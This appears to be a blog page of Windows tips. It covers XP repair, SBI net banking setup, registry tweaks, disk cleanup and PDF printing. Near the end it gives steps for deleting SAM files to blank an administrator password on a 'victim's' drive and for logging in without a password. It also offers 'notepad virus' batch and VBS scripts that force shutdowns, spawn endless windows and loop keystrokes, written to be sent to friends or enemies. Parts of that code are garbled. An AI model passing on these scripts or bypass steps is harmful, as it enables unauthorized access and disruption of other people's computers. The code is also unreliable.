Showing posts with label Computer Tricks. Show all posts
Showing posts with label Computer Tricks. Show all posts

Sunday, March 17, 2013

Trick to Repair Windows XP without Installation CD


Trick to Repair Windows XP without Installation CD

It is very annoying when our Computer is running on the Operating System whose files are corrupted and many times shows an Error message and make us Frustrated and leaving us with none other option than Re-installing the Windows. But this is not the solution we an also Repair it. But what if do not have the Installation CD. No problem Top Tricks and Tips is always there.

                         

                     
Here is a simple Trick to Repair Windows XP without Installation CD. To make use of this Trick just follow these steps : 1) Click on Start  >>  Run  >>  Type "webfldrs.msi" ( without quotes ).

                          
2) Now follow the Instructions.and select Re-install Mode.

                        

3) Now Check all the options on the New Screen which appears and click OK.


                        

4) Now Click Re-install button finally and it would take few minutes depending upon the System Conditions.

                           

5) Now after it Restart the Computer and it is done.

                        


So it is a simple Trick to Repair Windows XP without Installation CD.


Sunday, March 10, 2013

How to activate SBI Internet Banking



Internet Banking adds up many ways ease the facility of Banking. Receiving or paying money in secure and easy way is the key features of Internet Banking.
 Just recall olden days, when  individuals had to queue up at banking counters for withdrawing money for paying even pity expenses. Fears about mischievous act was the genuine issue on that time. But advent of Internet and after then Net Banking removes the miserable condition of common men. Now, common men are much more relived in terms transaction security and convenience. Paying Government sponsored Taxes as well as Utility Bills are not longer tough exercise today.
In India, State Bank of India (SBI) has already introduced Internet Banking. Anyone having bank account in SBI may use the facility of Net Banking. In order to activate SBI Net Banking,  account holders have to take following steps to get permission for it: -
  • Download Application Form from Official website of State Bank of India online SBI. Fill it up, and to the branch where you have an Account and Internet Banking is running there. Online Application Form for internet Banking activation can be downloaded by visiting: https://www.onlinesbi.com/registrationform.html 
  • You may visit the SBI Branch Office first and ask for Internet Banking Form.
  • After one to two-week from the date of submission of Application the password in a secure envelope will be reached to you. This envelope is sent by courier on your given address.
  • Now you are needed to log in SBI online Banking website For this you have to visit the website at given web address: https://www.onlinesbi.com/
  • . Here click on log in Button. This is like below:
sbi-online-log-in
From here you will go to a new page. here click on Continue to login:
sbi-online-log-in-2

  • Now log in page is in front of you. Here, you have to log in with the received password and change it with your own user name and password. This is mandatory. So I will suggest that write your own password and user name on plain paper, then start logging in. Fill up received user name and password and click on Login
sbi-login-page
  • Change your ID password .
  • Here, you have to add a profile password also so think about additional password  before log in. Set profile password.
  • Now, you are able to see your account balance and use facility of SBI Net Banking.
More protected database of SBI Net Banking gives full proof protection from Phishing. Users won’t have to share their password to anybody else for secure login.
To see login demo click this link and next time click login: SBI Online Banking Login Demo
To activate Internet Banking in SBI one may online:

Tuesday, October 23, 2012

Command Prompt on Right-Click

Command Prompt on Right-Click

Many computer users, specially the programmers, need to launch a command prompt window every once in a while to execute some dos/shell commands. The problem is, when a command prompt window launched, the default path is normally the system path or the user profile's path. The users will then have to do all the "cd" commands to change the directories to the path he/she wants.
This trick shows you how to add an option called "Command Prompt" when you right-click on a folder in Windows. With this option, a Command Prompt Window will launch and its current directory will be the path to the folder you've selected.
Use this trick at your own risk.
Here's what you'll get:


 











The Solution
You can either edit your registry OR download the registry file and apply it on your computer.
Method I. Manually edit the registry:
  1. Start > Run
  2. Enter "regedit" and hit Enter
  3. Expand to "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell"
  4. Right-click on "shell" and select New > Key
  5. Make sure a new key is created under "shell". Change the name of this key to "Command Prompt"
  6. Right-click on this new key "Command Prompt" and select New > Key
  7. Change the name of this key to "command"

  8. Here's what we should have:

  9. Double-click on the "(Default)" text on the right window to bring up the edit box
  10. Enter this text into the Value Data field:
    cmd.exe "%1"
  11. Click OK and close the registry.
Method II. Download and apply the registry file:
  1. Download this registry file Here
  2. Unzip it to a temp folder, then double-click on the .reg file to add the registry data.

 MORE Tricks



Thursday, August 30, 2012

Hard Drive Cleanup



Wonder why your computer is getting so slow lately? Most often, it's just your hard drive is getting full or carying too many junk files. Most of these files are temporary files and perfectly safe to be deleted. Cleaning up your hard drive every once in awhile will improve your PC performance.
You might wonder: Why Windows keeps those files if they're not necessary? "Temporary Internet Files", for example, everytime you browse to a webpage, your web browser requests the contents from the host, saves them locally as cache, then displays the contents to your browser window. Now, to speed up the access time when you come back to the same page, your web browser might re-use those cache files if they're not changed from the webpage.
"Temporary Internet Files" are just one example of the temporary files you can clean up. Follow the steps below to clean up other temporary sources as well.
Most likely, temporary files are stored in the Operating System drive ("C Drive"), but it doesn't hurt to do a cleanup all of your hard drives every once in awhile.
Use this trick at your own risks
  1. Launch the Disk Cleanup utility by either:
    - "Start" >> "Programs" >> "Accessories" >> "System Tools" >> "Disk Cleanup", or:
    - "Start" >> "Run", enter "cleanmgr" then press Enter.
  2. Select the disk you want to clean up from the drop-down box (i.e. "Local Disk C") and click "OK":



  3. Windows will calculate the space on your selected hard drive. This might take a few minutes depending on the size of your hard drive:



  1. Once Windows is done with the calculation, Disk Cleanup Utility displays. Here you can select which temporary sources you want to clean up (under "Files to delete"). It doesn't hurt if you select them all when you really need some spaces on your hard drive. Notice the usage size on some of these sources may be very big



  2. Click "OK" after your selections, then click "Yes" on the prompt.
  3. Disk Cleanup Utility starts to clean up your hard drive. This might take a long time depending on the current usage level of your hard drive. During the cleanup process, your computer might be very slow, so go watch a TV show or something. After cleaning up your hard disks, perform a disk defragmentation could really help your pc run faster.



Command Prompt on Right-Click


Many computer users, specially the programmers, need to launch a command prompt window every once in a while to execute some dos/shell commands. The problem is, when a command prompt window launched, the default path is normally the system path or the user profile's path. The users will then have to do all the "cd" commands to change the directories to the path he/she wants.
This trick shows you how to add an option called "Command Prompt" when you right-click on a folder in Windows. With this option, a Command Prompt Window will launch and its current directory will be the path to the folder you've selected.
Use this trick at your own risk.
Here's what you'll get:








The Solution
You can either edit your registry OR download the registry file and apply it on your computer.
Method I. Manually edit the registry:
  1. Start > Run
  2. Enter "regedit" and hit Enter
  3. Expand to "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell"
  4. Right-click on "shell" and select New > Key
  5. Make sure a new key is created under "shell". Change the name of this key to "Command Prompt"
  6. Right-click on this new key "Command Prompt" and select New > Key
  7. Change the name of this key to "command"

  8. Here's what we should have:

  9. Double-click on the "(Default)" text on the right window to bring up the edit box
  10. Enter this text into the Value Data field:
    cmd.exe "%1"
  11. Click OK and close the registry.
Method II. Download and apply the registry file:
  1. Download this registry file Here
  2. Unzip it to a temp folder, then double-click on the .reg file to add the registry data.



Convert Any Document or Web Page to PDF

Somebody just told you that you need to have Adobe Acrobat (Writer) to create a PDF file? Guess what, you can get away from that pricey piece of software if you just need to convert some documents to pdf, without a need of fancy editing the pdf document.
Here's how. Thanks to the BullZip, who provides a Free Pdf printer. With this free tool, you can simply "print out" your document or webpage to a pdf file, just about the same way as you print it out to a printer.

You can visit BullZip.com for more information about the software.
Here the direct link to BullZip downloads page: Downloads
  1. To get started, first follow the link above and download Free Pdf Printer from BullZip, then install it to your computer.
  2. Once you're done, you might need to close the program (or the web browser) which you're currently viewing the document. This helps refreshing the list of available printers on your computer.
  3. Once you get back to the document you want to convert, perform the same steps are you print out the document, i.e. File > Print ...
  4. When you see the Print window pop-up, select "Bullzip PDF Printer" under "Printers", then click "OK".
  5. BullZip PDF Printer will then start to analyze your document and display a new pop-up window, where you can direct it to the location you want to save the pdf file.
  6. Follow the pop-up windows and.. hola! The PDF document is created!

Sunday, May 20, 2012

shortcut key for Computer

Short cut for opening "Add or Remove Programs" window is

1. Open Run
2. Type appwiz.cpl




Alt+ctrl+delete
This is for task manager.
Alt+tab
This is for easy way of select next minimize window  




How to Turn Your Num Lock On Forever?
You can set your Num Lock to stay on by default when you logon your system.

There are two different techniques to set Num Lock stay on by default.

If you can use Registry Editor correctly then Click on start button and type Regedt32.exe in Run command. Here Navigate to HKEY_USERS\.Default\Control Panel\Keyboard and change the value for InitialKeyboardIndicators from 0 to 2.

You can do same by configuring the script to change the NUM LOCK state. Click Start button and then open Notepad. Copy the giving code and paste in Notepad.




set WshShell = CreateObject("WScript.Shell")

WshShell.SendKeys "{NUMLOCK}"

Now save this file with name "num.vbs" must including the quotes. At the end copy this file to user startup folder. The path for this folder is Documents and Settings\All Users\Start Menu\Programs\Startup.

Now restart the computer. Num Lock should come on and stay on.

Clean out the prefetch folder

Windows XP uses a system called 'prefetch' to organize and preload some of the data necessary for commonly used applications and files. A folder called prefetch is used to store the information the operating system needs to carry out this operation.
After several months of use, the prefetch folder may become quite overloaded with older references to software and files that may no longer be in use.It's a good idea to manually empty the older files out of the prefetch folder every few months or so.
To do this: Navigate to 'c:\windows\prefetch' and delete all .
PF files that are older than a week or two.

Hidden Programs In Windows XP



Is it strange to hear , but true that some good programs are hidden in Windows XP !!!

Programs :

1. Private Character Editor :

Used for editing fonts,etc.
** start>>Run
** Now, type eudcedit

2. Dr. Watson :

This an inbuilt windows repairing software !
** start>>Run
** Now, type drwtsn32

3. Media Player 5.1 :

Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!
** start>>Run
** Now, type mplay32

4. iExpress :

Used to create SetupsYou can create your own installers !
** start>>Run
** Now, type iexpress


How to "Delete administrator Password" without any software



Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step
1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->configStep 5. And delete SAM.exe and SAM.log

Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer :-)


LOGN IN XP WITHOUT PASSWORD




1) start computer
2) when it asks for password press ctrl+alt+delete keys twice
3) now another window opens asking for password.
4) in this at the place of user name just type administrator....leave the password feild blank and hit enter
5)wow u have logged in as a normal user
6) now u hav full authority only problem is that u can't open my document of the original account.
6) don't worry abt. this just use any file recovery softwere and move the files from acess denied my document to any other folder(in other drive)

NOTEPAD VIRUS CODES

1. Cycle a message in your friend's computer:
open notepad and Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as Anything.BAT and send it to ur frenz or enemy.

2. Convey your friend a lil' message and shut down his / her computer:
Type :

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s


Save it as Anything.BAT in All Files and send it.


3.Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top


Save it as Anything.BAT and send it.

 4.Hack your friend's keyboard and make him type You are a fool simultaneously
Type :
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop

Save it as Anything.VBS and send it.

Related Posts Plugin for WordPress, Blogger...